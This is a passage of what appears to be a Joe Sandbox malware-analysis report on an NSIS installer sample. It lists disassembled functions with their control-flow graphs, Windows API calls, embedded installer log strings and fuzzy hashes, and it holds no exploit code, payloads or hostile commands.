                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                          • CloseClipboard.USER32 ref: 0040546E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                          • String ID: @rD$New install of "%s" to "%s"${
                                          • API String ID: 2110491804-2409696222
                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                          Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                          APIs
                                          • #17.COMCTL32 ref: 004038A2
                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                          • API String ID: 2435955865-239407132
                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                          Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                          Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                          Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                          Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                          • ShowWindow.USER32(?), ref: 004054D2
                                          • DestroyWindow.USER32 ref: 004054E6
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                          • EnableWindow.USER32(?,?), ref: 00405757
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: @rD
                                          • API String ID: 3282139019-3814967855
                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                          APIs
                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                          • ShowWindow.USER32(?), ref: 00401753
                                          • ShowWindow.USER32(?), ref: 00401767
                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                          Strings
                                          • Rename: %s, xrefs: 004018F8
                                          • Rename on reboot: %s, xrefs: 00401943
                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                          • SetFileAttributes failed., xrefs: 004017A1
                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                          • BringToFront, xrefs: 004016BD
                                          • Sleep(%d), xrefs: 0040169D
                                          • detailprint: %s, xrefs: 00401679
                                          • Call: %d, xrefs: 0040165A
                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                          • Rename failed: %s, xrefs: 0040194B
                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                          • Aborting: "%s", xrefs: 0040161D
                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                          • Jump: %d, xrefs: 00401602
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                          • API String ID: 2872004960-3619442763
                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
